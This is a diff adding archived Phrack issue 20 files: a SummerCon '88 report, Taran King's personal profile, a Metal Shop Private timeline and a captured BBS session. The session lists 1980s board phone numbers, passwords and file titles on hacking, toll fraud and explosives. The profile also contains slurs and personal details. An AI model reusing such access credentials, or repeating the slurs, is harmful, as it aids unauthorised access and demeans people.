+Special Thanks goes to Epsilon and Crimson Death.  Without their help, there
+would not have been a SummerCon this year and thanks to their efforts, I will
+see to it that there will be a SummerCon for many years to come.
+-------------------------------------------------------------------------------
+According to Dr. Cypher, Byteman was supposed to fly down to St. Louis for the
+convention, but ran into a mishap with airport security.  In his carry-on bag
+he had several switch blade knives and six blue boxes, which at the time were
+believed to be detonators for some kind of explosive.  After being held at the
+airport, Byteman was met by the FBI who had verified that the items in question
+were not detonators, however they did recognize what they were and now Byteman
+is facing charges of conspiracy to commit toll fraud, etc.
+-------------------------------------------------------------------------------
+Crimson Death claims to have received a call from John F. Maxfield a few days
+preceding SummerCon '88.  Apparently he wanted an invitation to the convention.
+Nevertheless, he did not show up.  Also, there was some talk about Richard
+Sandza going to SummerCon, but he was not there either.
+-------------------------------------------------------------------------------
+Ramada Inn Lost And Found:
+- Has anyone seen the 1981 Employee Of The Month Plaque?
+- Whoever took it must have been out of CONTROL.
+-------------------------------------------------------------------------------
+SummerCon '88 Guest List
+~~~~~~~~~~~~~~~~~~~~~~~~
+        Bad Subscript / Cisban Evil Priest / Control C / Crimson Death
+    Dr. Cypher / Dr. Forbin / Doom Prophet / Forest Ranger / Hatchet Molly
+       Knight Lightning / Lucifer 666 / Phantom Phreaker / Phrozen Ghost
+ Surfer Bob / Synthetic Slug / Taran King / Terminal Technocrat / The Dictator
+                 The Leftist / The Mentor / The Ur-Vile / Tuc
+
+Plus;
+
+Katie, Cary, Kari, Amy, Susie, Mike1, Mike2, and Terminal Technocrat's friend.
+
+              Bringing this year's total attendance to 28 people.
+
+
+Hope you enjoyed the article because the future is forever.
+
+:Knight Lightning - The magic is back... With a VENGEANCE!
+_______________________________________________________________________________
+
+<><><><><><><><><><><><><><><><><><><><K><><><><><><><><><><><><><><><><><><><>
+<>                                                                           <>
+<> THE COMMUNICATIONS FRAUD CONTROL ASSOCIATION IS DEADLIER THAN WE THOUGHT  <>
+<>                                                                           <>
+<>     Even the most elite fear for the fate of the phreak/hack world...     <>
+<>                      but Knight Lightning has a plan                      <>
+<>                                                                           <>
+<>                                                                           <>
+<>                            THE VICIOUS CIRCLE                             <>
+<>                            ~~~~~~~~~~~~~~~~~~                             <>
+<>       Shadows Of A Future Past \ The Judas Contract \ Subdivisions        <>
+<>                                                                           <>
+<>         A three part series appearing in Phrack Inc. Newsletter.          <>
+<>                                                                           <>
+<><><><><><><><><><><><><><><><><><><><L><><><><><><><><><><><><><><><><><><><>
+
+                                      ^*^
+
diff --git a/phrack20/2.txt b/phrack20/2.txt
new file mode 100644
index 0000000..fc18aad
--- /dev/null
+++ b/phrack20/2.txt
@@ -0,0 +1,242 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 2 of 12
+
+                           ==Phrack Pro-Phile XX==
+
+                       Written and Created by Taran King
+
+                                    1/5/88
+
+         Welcome to the Phrack Pro-Phile XX.  Phrack Pro-Phile was created
+to bring info to you, the users, about old or highly important/controversial
+people.  This month, I bring to you someone who you all have seen and heard
+of...
+
+                                  Taran King
+                                  ~~~~~~~~~~
+                                    (me!)
+
+         Taran King (I) was the sysop of Metal Shop Private, a private
+exchange for telecommunications enthusiasts (phone phreaks and hackers) as
+well as being the home-base of Phrack Inc. which I ran.  I also had a hand in
+the organization of SummerCon '87 and PartyCon '87.
+------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle: Taran King
+           Call him: Randy, Randster, Randall, whatever (real name is Rand)
+       Past handles: None
+      Handle origin: The main character in The Chronicles of Prydain by Lloyd
+                     Alexander
+      Date of Birth: 7/11/69
+Age at current date: 19 years old
+             Height: 5'10" or so (give or take an inch)
+             Weight: 135-140 lbs. (I hate fat people)
+          Eye color: Brown
+         Hair Color: Brown
+          Computers: IBM PC, later with a hard drive added.
+  Sysop/Co-Sysop of: Metal Shop Private, The Brewery, Quick Shop/Metal Shop
+                     AE, Whackoland, The Dark Tower, Digital ITS (proud of
+                     that one) and probably a few more I've forgotten about.
+-------------------------------------------------------------------------------
+         I started out in the BBS world in September of 1983 when a friend
+gave me numbers to different modems which included things to hack on as well
+as bulletin boards.  I actually got my computer in late June of that year, but
+didn't understand the concept of the modem until that point. I got involved
+with David Lightman (314)'s board before it went up by beta-testing it for him
+at times and when he put it up, I ended up being user 2 and then soon after,
+co-sysop of The Dark Tower.  It was there that my local notariety became
+strong and a few people from the nation started calling in.  His board was
+very good with what he had and the little advertising that it got, but it
+eventually went down.  It was at that point when I started getting around
+nationally and was able to make connections of my own.  I put up Metal Shop:
+The Dark Tower Phase II a bit after because St. Louis totally lacked bulletin
+boards that dealt with hacking or phreaking.  I advertised around the country
+and drew in quite a crowd.  The board excelled with time to the point of
+having around 500 users when it got to be a security risk in my eyes and we
+put in the general password system (made by Cheap Shades, of course).
+Eventually, that crowd got weeded down to a lot fewer people and some time
+after that, I was hospitalized.  After my release from the hospital, Cheap
+Shades and I (me on the ideas and Shades on the programming) created a
+modified version of WWIV BBS program to suit my wants/needs and it resembled
+the old Shop set-up.  As time went on, it became a name of its own through the
+crowd that hung out on it as well as having Phrack Inc. as being based there.
+For more detailed explainations of how things came about and about a few
+things mentioned above, see the big history file in this issue of Phrack Inc.
+I've met a few members of the phreak/hack world including the following:
+Knight Lightning, Cheap Shades, Forest Ranger, The W(hack)o Cracko Bros., Dr.
+Forbin, Data Line, and Reverend Enge (all local to me), as well as Jester
+Sluggo, Blue Buccaneer, Phantom Phreaker, Doom Prophet, Bill from RNOC, Tuc,
+Dan The Operator, Lex Luthor, The Leftist, Sir Francis Drake, Loki, Disk
+Jockey, Control C, Synthetic Slug, Lucifer 666, Mad Hatter, Cutthroat, The Mad
+Hacker (219), Sir William, Dr. Cypher, Hatchet Molly, Bad Subscript, The
+Mentor, Cisban Evil Priest, Phrozen Ghost, Surfer Bob, Crimson Death (618), The
+Dictator, Doc Holiday (901), and The Ur-Vile.  Some of the memorable phreak
+boards I was on (besides my own) included The Dark Tower, The Pipeline,
+Broadway Show, Zyolog, Stronghold East Elite, Stronghold North, Hell Phrozen
+Over, Private Sector, Pirate-80, Stalag 13, Lunatic Labs UnLtd., Quick Shop,
+Metal Shop Brewery, NetSys, The Private Connection, ShadowSpawn, RACS III, The
+Pearly Gates, Brainstorm Elite, Metalland North, The Alliance, Intergalactic
+Dismantling, Inc. (IDI), DUNE, Speed Demon Elite, The Abyss, MetroMedia/Danger
+Zone Private, The Matrix, Thieve's World, FreeWorld II, Flying Circus, Twilight
+Zone, Septic Tank, The Lost City of Atlantis, Phantasie Realm, CHAMAS, and
+probably a few others I forgot that were important. Certain knowledge I've
+gained over the years is attributed to various boards forementioned as well as
+people like Bill from RNOC, Phantom Phreaker, Doom Prophet, The Videosmith, and
+many others not to mention reading (a key part to learning technical things)
+and social engineering.
+
+         I utterly hate working with computers for anything other than
+communicating with friends and occasionally word processing.  Programming on
+them is the most repugnant thought in the world to me (no offense Shades!).
+
+         I've really never been much for hacking at all, although I did gain a
+bit of an interest through the legitimate accounts I gained on systems such as
+NetSys run by Terminus in Maryland.  Hacking was never really much for me
+(besides looking at things on dull systems that were totally useless) when I
+first got the modem.  Now that I'm at college and have access to it, I'm
+learning VM/CMS a bit so that I can use Bitnet and work through/with it.
+
+         I attended and had a part in organizing both SummerCon '87 and
+PartyCon '87 (very much in SummerCon and very little in PartyCon).  I also
+attended SummerCon '88 for a little while on each of the days except Sunday. I
+was supposed to be on the NEW TAP staff, run by the W(hack)o Cracko Bros. as
+well as being on the staff of Telecomputist (which sponsored SummerCon '87) and
+doing all but writing articles for Phrack Inc.  Other than that, I'm not
+terribly involved with phreaker/hacker media.
+
+         The only group I was ever in was The 2600 Club! which later revised
+into The NEW 2600 Club! which was just as ignorant with more interesting names
+but about an equal participation in anything.  I learned I was able to advance
+through the phreak world without the booster of a club besides using my board
+as a reference.  I didn't need to rely on the work of others.
+
+-------------------------------------------------------------------------------
+
+        Interests: Telecommunications (basically phreaking knowledge-wise
+                   now), music (heavy metal of all sorts plus so much more
+                   and playing electric guitar), fraternity life (party), women
+                   (white ones, blond, with blue eyes, and NO FAT CHICKS!
+                   Namely, Kimberly), driving (and one day, I'll drive that
+                   fucking DeLorean!)
+
+Taran's Favorite Things
+-----------------------
+
+        Women: Kimberly (see above...I went all out!)
+         Cars: Lamborghini Contachs, DeLoreans, Lotuses, Vectors, etc.
+        Foods: NO VEGETABLES!
+        Music: Heavy metal, Pink Floyd, classic rock.
+      Leisure: Partying, playing guitar, spending time with the woman.
+Alcoholic fun: Tequila shots, Rum & Coke, good beer (pretty much anything),
+               Long Island Tea, and those funky teas you find at college
+               parties in garbage cans lined with garbage bags (hmm!)
+
+Most Memorable Experiences
+--------------------------
+
+Forest Ranger's conferences (what would YOU do for a Klondike Bar at 3am?).
+Car accident with Jester Sluggo as well as almost a 2nd time afterwards (keep
+         drinking!).
+Bell Shock Force conferences (yes ma'am, I'm sorry but you'll just have to cut
+         those wires)
+Getting busted in late May '87 (don't try it, it ain't fun).
+SummerCon '87 (a better party than PartyCon '87, met a lot of great people).
+PartyCon '87 (a lot of fun, but too unorganized although I met a few more
+         people that I had wanted to).
+SummerCon '88 (wait, did I attend that???).
+
+
+Some People to Mention
+----------------------
+
+Knight Lightning (my right hand man; although he wasn't terribly
+         knowledgeable, he was always there and trying to help out and still
+         is!|)
+David Lightman 314 (for allowing me to use his program to start what turned
+         out to be Metal Shop Private)
+Man-Tooth (my original 2nd co-sysop next to KL who drove me down to David
+         Lightman's house in South-fucking-County St. Louis for 30 minutes)
+Dr. Forbin/Mr. Modem (for re-transferring the original program after something
+         got fucked after the ride to South-fucking-County)
+Forest Ranger (wild man, can't say much about him without getting hurt|)
+Phantom Phreaker (we found ya for 2600 Club and you excelled far beyond any of
+         the rest of us in the club did, plus you helped my board immensely)
+Barbie Doll (for suggesting the idea of Phrack Inc. in different words even if
+         nobody knows what or who you were or where you were from)
+The W(hack)o Cracko Bros. (what a couple of idiots)
+Oryan Quest (never has there been as bad a pest as this man, but he turned out
+         to be human Mexican, but human| after we were both busted,
+         interestingly enough)
+Lex Luthor (for freaking me out when he first called my board and contributing
+         a bit here and there)
+Capt. Hook (taught me a bit about social engineering here and there and
+         introduced me to a few people as well as helping out a couple of
+         times)
+Cheap Shades (what would Metal Shop have been without the programming mastery
+         of this individual; my left hand man and great friend as well)
+Tuc (generally a good friend and historical reference as well as creating the
+         Pro-Phile that I based the rest of them on)
+Bill from RNOC (another one of my best friends who is the smartest person
+         potentially, and definitely the smartest when it comes to phreaking
+         and hacking put together; a great source of information, and one of
+         the most hilarious people I know)
+Olorin The White (if this guy puts me in his group one more time, I'm gonna
+         kill him!)
+
+Inside Jokes
+~~~~~~~~~~~~
+Mary likes corn.  Are you stupid (corn, cheese, free)?  Supervisors at Pizza
+Hut?  Essscuse me Mr. Corley, but I was juss lookin' fo sum bonez...I'm Bosco.
+What's the worse that could happen?  Smoke.  Raggy!  Raggy! HeeheeHEEHeeheehee
+hee.  KS-KS-KS <Gulp!>.  Do you know any phreaks who carry around their own
+trunks.  IIIII Like Chi-Nese!  Listing for Dalkon Shields please.  I know
+that's a blue box!  Hello, security?  Do we have a trace?  We do.  Good.
+<LAUGHTER!>.  AMD.  We make display.  We're hopping on a plane now and coming
+to Maryland to kick your ass!  For $20 I'll sell you 5 lbs. of baking soda.
+Doesn't he look like The Fly?  You almost just hit the car again!  Keep
+drinking!  It was the other side of the car this time!  Keep drinking!  Do you
+know what your aunt would do to you if you got in another accident?  Keep
+drinking!  I hate it when your dick hits the water in the bottom of the
+urinal, don't you?  But what do you think about it?  But what do you think
+about it?  But what do you think about it?  And a complimentary beer comes
+with the room.  Domino's dude!  Ya wanna get paid?  Run to me boys.  Guess
+where I'm calling from?  NO!  NO!  COCKSUCKER!  I'mLuckyI'mLuckyI'mLucky!  But
+first off, do you have Karl Marx's phone number?  Dude.  NAA.  Dude.  NAA.
+Dude.  NAA.  The meat was SOOOO tender, it just slid off the bones.  Chicken.
+Hey, you know like you have a little piece of wire hanging down from your
+nose?  Jolly Green Faggot.  That made me pucker my lips.  Sweet.  Baksketball
+Jones.  HAHAHAHAHA<fart>HAHAHAHA.  You Bonehead.  I would have reached my hand
+in but I had just finished deficating.  Dan, you're too thin for your voice.
+You can almost hear the dogs across the street barking.  I only want to know
+two things:  1) How do you blue box off of CCIS and 2) how do you remotely take
+total control of LMOS?  NO!  I'M BIOC!  <STAMP>  BIOC  <STAMP>  BIOC  <STAMP>
+BIOC.  "BIOC Agent 003 was arrested today for stamping his name on his RA's
+forehead."
+
+-------------------------------------------------------------------------------
+
+         I'm against pretty much all forms of fraud now that I've spent the
+night in jail, the summer of '87 in pain and waiting, and will spend the next 3
+years of my life on probation.  I'm not informing to anyone about anything if
+you have thoughts about that statement, but I have no part in anything
+fraudulent. I've always thought that carding was the most stupid crime
+connected with computers and that it's too risky to be worth it in the end.  I
+hope that the future phreaks and hackers keep around and retain what's been
+built up over the many years since long before I'd heard of phreaking or
+hacking.
+
+-------------------------------------------------------------------------------
+
+I hope you enjoyed this file.  Although I had at one time intended on this
+being my last Pro-Phile, it's actually the first of many to come...And now
+for the regularly taken poll from all interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  Generally, the cool ones aren't, but
+of course, in every large group of people, you'll probably find a few geeks
+here and there.  Thanks for your time, Randy.  No problem, Randy.
+
+                                            Taran King
+=========================================================================
diff --git a/phrack20/3.txt b/phrack20/3.txt
new file mode 100644
index 0000000..a910bd5
--- /dev/null
+++ b/phrack20/3.txt
@@ -0,0 +1,77 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 3 of 12
+
+                    Phrack Inc./Metal Shop Private Timeline
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Winter 1982 - CS gets computer system (TI-99)
+
+Summer 1983 - TK gets computer system
+
+Fall 1983 - Andy Kutner gave TK phone numbers to local BBSes, mainframes, and
+            MCI/Sprint dial-ups; KL gets computer (no modem yet) and gets into
+            pirating
+
+February 1984 - David Lightman 314 puts up The Dark Tower, TK becomes co-sysop
+
+March 1984 - KL gets modem, becomes Dark Tower Co-sysop
+
+March 1985 - CS gets modem, enters phreak/hack scene through Man-Tooth by
+             giving Shades first BBS list
+
+June 1985 - 2600 Club formed on Laserbeam, local board with phreak/hack subs
+
+July 1985 - Phone line installed, Metal Shop: The Dark Tower Phase II arises
+            with KL and Man-Tooth as co-sysops; Dr. Forbin/Mr. Modem helps out
+            through ideas on The Forbin Project plus helping by sending source
+            to TK after original screwed
+
+August 1985 - Dark Tower rearises and struggles against MS for a while, but
+              failed and downed within 1 month;  CS gets IBM XT set-up
+
+September 1985 - "Dark Tower Phase II" dropped, making the board Metal Shop
+
+November 17, 1985 - Phrack Inc. formed as a newsletter based around 2600 Club
+
+December 1985 - The New 2600 Club formed; 2601 Club, etc; 2600 Club totally
+                dissolved; MS AE goes up
+
+January 2, 1986 - Metal Shop becomes MSP
+
+January 1986 - Phrack World News (Phreak World News) starts
+
+February 1986 - Whackoland goes up; Whackoland Gazette idea started, developed
+                into New Tap which was going to be sponsored by MSP as well as
+                others; Telepub '86.
+
+March 1986 - The Brewery becomes MSB, making the Metal Shop Triad; MSP changes
+             gen. pw to up security due to busts on Phoenix Phortress from
+             (PW was...) REQUIRED to MADHOUSE (Anthrax song)
+
+March 26, 1986 - Master Lock vs. Phrack Inc. situation arises
+
+April 27, 1986 - MS AE goes 40 megs
+
+May 2, 1986 - CS visited by FBI
+
+May 10, 1986 - Institutionalized therefore MSP downed on May 12
+
+June 8, 1986 - Telecomputist becomes a supported product of MSP
+
+August 1986 - Quick Shop goes up
+
+March 1987 - Quick Shop goes down
+
+May 1987 - CS & TK busted; MSP down forever
+
+June 19-21, 1987 - SummerCon '87
+
+July 21, 1987 - Summer '87 busts
+
+July 24-26, 1987 - PartyCon '87
+
+July 22-24, 1988 - SummerCon '88
+
+                                      ^*^
+=========================================================================
diff --git a/phrack20/4.txt b/phrack20/4.txt
new file mode 100644
index 0000000..0a6c191
--- /dev/null
+++ b/phrack20/4.txt
@@ -0,0 +1,1259 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 4 of 12
+
+                         Welcome To Metal Shop Private
+                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+    As a final farewell, we've decided to release what remained on Metal Shop
+Private at the time it went down.  We regret that due to our misjudgement some
+of the messages were deleted because of the expiration date on the messages.
+The following is a run through of the whole board program as if you were
+logging on remotely.  Various explainations for various parts of the board will
+be given in parentheses.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ACCOUNT: MADHOUSE    (MADHOUSE was the general password in case you were not
+                      on the system.)
+
+
+
+                           Once again...Welcome to:
+                               _  _       _______
+                              | \/ |     / _____/
+                              |_||_|etal/ /hop
+                              _________/ /
+                             /__________/
+
+                                 P R I V A T E
+
+                                 300/1200 Baud
+                         24 hours a day, 7 days a week
+
+                     We know YOU'RE coming to SummerCon...
+
+                                    RIGHT?
+
+
+Enter number or name
+NN: TARAN KING
+PW: XXXXXXXX
+PH: #-#-XXXX
+
+(There was no new user password.  Unless you had someone else's password, there
+ was no way outside of applying for membership through me to get on the system)
+
+Last few callers:
+
+4869: Sir Francis Drake 56
+4870: The Sensei 18
+4871: The Sensei 18
+4872: Knight Lightning 2
+4873: Cheap Shades 3
+You are caller 4874
+
+
+Auto message by: Unknown User
+
+Congratulations to the class of 1987...
+now FUCK OFF!!!!! hmmm....
+
+
+
+Name: Taran King 1
+Time allowed on: 255
+Last on        : 07/28/87
+
+
+T - 4:14:55
+Main > M
+
+
+(At this point, we jumped to the message base and data-captured all the
+ messages into separate files.  If you feel like maintaining continuity, read
+ those files now.)
+
+
+(We're back from the message base now.)
+
+T - 3:37:55
+Main > ?
+
+                             Main Menu Commands:
+                             ~~~~ ~~~~ ~~~~~~~~~
+
+A:dd to BBS List    B:BS List           C:hat with Taran    D:oors Menu (AE)
+E:-Mail Menu        F:iles Section      K:ey Input Toggle   L:og of the Day
+M:essage Base       N:eed-Acronyms Base O:utta Here         S:tatus Menu
+V:oting Booth       W:rite Auto Msg.    X:-pert ON/OFF      -:Fast Log Off
+
+
+T - 3:37:45
+Main > B
+                         Boards List From...
+                            _  _       _______
+                           | \/ |     / _____/
+                           |_||_|etal/ /hop
+                           _________/ /
+                          /__________/
+                            P R I V A T E
+                            (314)432-0756
+
+314-432-0756  Metal Shop Private (Sysop: Taran King)
+314-394-8259  Metal Shop Brewery (Sysop: Beer Wolf)
+201-366-4431  The Private Sector (Sysop: Private Sector) (Temporarily Down)
+201-837-8504  The Radical Board (Sysop: The Radical)
+215-844-8836  Lost City Of Atlantis (New: DIGITAL) (Sysop: The Lineman)
+219-322-7266  The Private Connection (PW: PHOENIX) (Sysop: The Mad Hacker)
+219-659-1503  ShadowSpawn (Login: JOB*FUCK) (Sysop: The Psychic Warlord)
+301-540-3659  NetSys Unix (2400 Baud) (Sysop: Terminus)
+301-540-3658  NetSys Unix (1200 Baud) (Sysop: Terminus)
+301-540-3657  NetSys Unix (1200 Baud) (Sysop: Terminus)
+301-540-3656  NetSys Unix (1200 Baud) (Sysop: Terminus)
+304-744-2253  Pirate 80 (Sysop: Scan Man)
+305-395-6906  Digital Logic's Data Service (New: DIGIT)(Sysop: Digital Logic)
+313-641-9649  Phantasie Realm (Login: NEW  2nd Login: CANON) (Sysop: Ctrl C)
+313-851-0912  Scan Line (New: SCANACO) (Sysop: The Scanner)
+314-921-7938  Telecomputist Newsletter Newsline (Sysop: Forest Ranger)
+415-522-3074  Speed Demon Private (Password: LEGACY) (Sysop: The Rocker)
+616-344-2718  Thieve's World (Sysop: Thomas Covenant)
+806-799-0016  Phreak Klass Room 2600 (PW: EDUCATE) (Sysop: The Egyptian Lover)
+818-993-7422  The Abyss (New User Acct.=CAMA  PW=CAROT) (Sysop: Dark Cavalier)
+914-LOG-ONIT  RACS III - TUCBBS (Sysop: Tuc)
+213-559-7306  Telecom & Sports Line (Sysop: Computer Wiz Kid)
+
+
+
+
+T - 3:37:32
+Main > C
+
+
+Sysop not available
+Use Feedback instead.
+E-mail TARAN KING 1? No
+
+
+T - 3:37:13
+Main > C
+
+
+Reason: just for demonstration purposes
+Chat call now on.
+
+
+
+
+T - 3:36:54
+Main >
+
+Sysop's here...
+
+(The first is an example of the usual answer to trying to chat with TK... If
+ you were lucky you might occasionally actually get to talk with him like
+ this, but not often as he usually kept chat call off.)
+
+
+Chat mode over...
+
+Main > D
+
+(This section of the board was installed to allow easy uploading of files for
+ Phrack as well as regular g-philes, etc. via AE).
+
+T - 3:36:45
+Doors (,?,Q) > ?
+N  Description                       Used
+== --------------------------------  ====
+1. AE TRANSFER PROGRAM               136
+
+
+
+
+T - 3:36:43
+Doors (,?,Q) > Q
+
+
+T - 3:36:40
+Main > E
+
+
+T - 3:36:36
+E-Mail> ?
+
+
+                                 E-Mail Menu:
+                                 ~~~~~~ ~~~~~
+
+F:eedback           K:ill old mail      M:ulti-mail         Q:uit
+R:ead mail          S:end mail
+
+
+
+
+
+
+T - 3:36:33
+E-Mail> Q
+
+
+T - 3:36:30
+Main > F
+
+(All of the files found on the AE section were also available here with
+ descriptions for downloading.  The following is a list of the available files
+ at the time that the board went down.)
+
+ Main Section
+
+1:  Hacking Philes
+2:  Phrack Inc.
+3:  Phrack Inc. II
+4:  Phreak Philes
+5:  Phreak Philes II
+6:  Series/Articles
+
+
+Gfiles: (1-6, ^0),L,Q : 1
+
+ Hacking Philes
+
+1: The Basics of Hacking I-III by TKOS
+2: The Basics of Hacking:Intro by Dr.Pepper
+3: Technical Hacking:Vol.I by The Warelock
+4: Govt.Computer Security Techniques I
+5: Govt.Computer Security Techniques II
+6: Govt.Computer Security Techniques III
+7: The Trojan Horse Method of Hacking
+8: The Fine Art of Telesearching by Dragyn
+9: Hacking RSTS by Sam Sneed
+10: Hacking the RSTS/E System Volume I
+11: Basic RSTS
+12: RSTS Backdoors Part II by The Marauder
+13: Hacking RSTS/E v9.X-XX Vol.I by Marauder
+14: Inside RSTS/E Volume I by The Marauder
+15: Inside RSTS/E Volume II by The Marauder
+16: Inside RSTS/E Volume VI by The Marauder
+17: RSTS Chat Program
+18: RSTS Terminal to Terminal Comm Program
+19: PDP-11 Basic Plus Programming by CEO
+20: Introduction to the PDP-10 with TOPS-20
+21: Hacking TOPS by Galactus and Blitziod
+22: Notes on TOPS-20 System by Blue Archer
+23: A Beginner's Guide to Hacking Unix
+24: Basic Unix Use by Lord Lawless
+25: A Basic Guide to Hacking Unix by TEL
+26: Unix - Operating System of the Future
+27: Unix Usage Notes by Striker
+28: Unix Users' G-Phile by The Line Breaker
+29: Output from Unix's Fortune Program
+30: Hacking VAX's VMS by Lex Luthor & LOD/H
+31: Advanced Hacking VAX's VMS by Lex Luthor
+32: Hacking VAX's VMS Part III by Lex Luthor
+33: World of VAX
+34: Hacking the HP2000 by BIOC Agent 003
+35: Hacking the HP2000 Intro
+36: Hacking the HP2000 Part I
+37: Hacking the HP2000 Part II
+38: Hacking the HP2000 Part III
+39: Hacking the HP2000 Part IV
+40: Hacking the HP2000 Part V
+41: Hacking the HP3000 by TFA
+42: Hacking the HP3000 by De Bug
+43: Hacking the HP3000 by Galactus/Blitziod
+44: Fun With Music by Ozzy Osbourne
+45: Hacking SUNY's Prime-Net by B. Banzai
+46: Hacking Primos Systems - Nanuk of the N.
+47: Hacking Primos Vol. 1 by Codes Master
+48: Hacking Primos Vol. 2 by Codes Master
+49: Hacking Cosmos I-II by Lex Luthor-LOD/H
+50: Cosmos Frame Training Manual by Loki
+51: 1986 Cosmos Files Pt.I:Intro
+52: 1986 Cosmos Files Pt.II:Facility Prefix
+53: 1986 Cosmos Files Pt.III:Service Orders
+54: Common Bell System Computers by F.Carson
+55: Hacking TRW by Mark Hamill
+56: TRW Address Formats by The Line Breaker
+57: TRW Code Definitions by The Line Breaker
+58: TRW Terminology by Master Blaster
+59: Hacking Dun & Bradstreet by BIOC and TUC
+60: Telenet Dir, Tutorial, & Term. ID's
+61: The Telenet Connection: Int'l Accessing
+62: Access to Telenet Via Int'l Telex
+63: Hacking ARPAnet I by The Source
+64: Hacking ARPAnet II by The Source
+65: Hacking ARPAnet III by The Source
+66: The Hackman's Arpanet Tutorial Part IV
+67: Hacking ARPAnet V by The Source
+68: Hacking ARPAnet VI by The Source
+69: Hacking The Lexington Air Force Computer
+70: Defense Data Network Blues by Baud Baron
+71: The Ins and Outs of Packet Switching
+72: How-To-Series: Hacking Tymnet
+73: Tymnet Numbers from PhoneLine Phantoms
+74: Hacking the IBM VM/370 By Another Hacker
+75: IBM's System/370 by The Motorhead
+76: Hacking VM/370 by Galactus and Blitziod
+77: VMSSP Systems Part I by The Motorhead
+78: VMSSP Systems Part II by The Motorhead
+79: RSX11M Version.3x Real Time OpSys
+80: RSX11M 4 Version 3.x by Terminus and LD
+81: RSX11M 7 Version 3.x by Terminus and LD
+82: The RSX-11M File by The Omen
+83: Exploring GEISCO by Boethius
+84: FACS Facts by Sharp Razor
+85: Chilton Corp. Credimatic by Ryche
+86: Chilton Corp. Credimatic by Ryche Ver. 2
+87: Hacking Bank Of America by Dark Creaper
+88: Hacking Bank Of America Part II
+89: Mini-Dir to Dow Jones News/Retrieval
+90: CompuServe Tips by Eric Diamond
+91: Free CompuServe Passwords
+92: A Basic Guide To The Source & CompuServe
+93: The SCRATCH PAD Electronic Info System
+94: The SCRATCH PAD System Part II
+95: PACTIME Computers by Phone Bug
+96: EasyLink Mail-Grams Directory
+97: Hacking WVNET
+98: Hacking Alpha Systems by By-Tor
+99: Dartmouth Kiewit System by Lone Ranger
+100: Hacking McDonalds Computer by Herb
+101: Hacking Western Union's EasyLink by BIOC
+102: Uninet Logon Procedures and Directory
+103: Peacock Timeshare Systems by The Omen
+104: Hacking Rampart Systems Pt.1 by TWCB
+105: Hacking Rampart Systems Pt.2 by TWCB
+106: International Hacking Notes by Reaper
+107: Packet Networks by Mad Max of W. Germany
+108: The Basics of Radio Hacking Part I
+109: The Basics of Radio Hacking Part II
+110: Government 800 Numbers
+111: E/COM Directory: U.S. Postal Service
+112: 314-721-4801 Network Fun by The Trapper
+113: Toll Library Numbers by Shadow 2600
+114: The 310 Pre-Phix: Hacker's Paradise
+115: Dial-It Services by Scan Man
+
+
+Gfiles: (1-115, ^0),L,Q : Q
+
+
+Gfiles: (1-6, ^1),L,Q : 2
+
+ Phrack Inc.
+
+1: Phrack I Introduction by Taran King
+2: Hacking SAM's Dial-Up Security
+3: Boot Tracing Made Easy by Cheap Shades
+4: The Phone Phreak's Fry-Um Guide
+5: Using MCI Calling Cards by KL
+6: How to Pick Master Locks by Ninja and GF
+7: Acetylene Balloon Bomb by Clashmaster
+8: Schools & University Numbers
+9: Phrack II Index by Taran King
+10: Prevention of the Billing Office Blues
+11: Homemade Guns by Man-Tooth
+12: How to Make Blow Darts by The Pyro
+13: TAC Dialups by Phantom Phreaker
+14: Total Universal Info Services Via ISDN
+15: MCI Overview by Knight Lightning
+16: The Hackers Guide to RSTS-E 8.0
+17: Phreak World News I by Knight Lightning
+18: Phrack III Index by Cheap Shades
+19: ROLM Profile by Monty Python
+20: Shotgun Shell Bombs by Man-Tooth
+21: Signalling Systems Around the World
+22: Private Audience by The Overlord (313)
+23: Fortell Systems by Phantom Phreaker
+24: Electronic Eavesdropper by Circle Lord
+25: Making a Shock Rod by Circle Lord
+26: Introduction to PBX's by KL
+27: Phreak World News II by Knight Lightning
+28: Phrack Pro-Phile I on Crimson Death
+29: Ringback Codes for the 314 NPA
+30: False Identification by Forest Ranger
+31: Profile of MAX Long Distance Service
+32: Breaching and Clearing Obstacles by TK
+33: Crashing DEC-10's by The Mentor
+34: Centrex Renaissance Pt.II by Sluggo
+35: Homemade Speed by The Leftist
+36: PWN III Part I by Knight Lightning
+37: PWN III Part II by Knight Lightning
+38: PWN III Part III by Knight Lightning
+39: Intro to Phrack V by Taran King
+40: Phrack Pro-Phile II on Broadway Hacker
+41: Hacking DEC's Part I by Carrier Culprit
+42: Hand-To-Hand Combat by Bad Boy In Black
+43: Digital Multiplex System (DMS) 100 by KL
+44: Bolt Bombs by The Leftist
+45: Wide-Area Networks by Jester Sluggo
+46: Short-Wave Radio Hacking by The Seker
+47: Mobile Telephone Communications
+48: PWN IV Part I by Knight Lightning
+49: PWN IV Part II by Knight Lightning
+50: PWN IV Part III by Knight Lightning
+51: Phrack VI Index by Taran King
+52: Pro-Phile on Groups by Knight Lightning
+53: The Technical Revolution by Dr. Crash
+54: How to Have Fun With a Bic by Leftist
+55: Unix Nasties by Shooting Shark
+56: Smoke Bomb by Alpine Kracker
+57: Cellular Telephones by High Evolutionary
+58: Wide-Area Networks II by Jester Sluggo
+59: PWN V Part I by Knight Lightning
+60: PWN V Part II by Knight Lightning
+61: PWN V Part III by Knight Lightning
+62: PWN V Part IV by Knight Lightning
+63: PWN V Part V by Knight Lightning
+64: Phrack VII Index by Taran King
+65: Phrack Pro-Phile IV on Scan Man
+66: Hacker's Manifesto by The Mentor
+67: Hacking the Chilton Corp. Credimatic
+68: Programming RSTS/E File1: Programming
+69: American Dynamite by The Rocker
+70: Unix Trojan Horses by Shooting Shark
+71: PWN VI Part I by Knight Lightning
+72: PWN VI Part II by Knight Lightning
+73: PWN VI Part III by Knight Lightning
+74: Phrack VIII Index by Taran King
+75: Phrack Pro-Phile V on Tuc by Taran King
+76: City-Wide Centrex by The Executioner
+77: The Integrated Services Digital Network
+78: The Art of Junction Box Modeming
+79: Compuserve Info by Morgoth & Lotus
+80: Fun with Automatic Tellers by Mentor
+81: PWN VII Part I by Knight Lightning
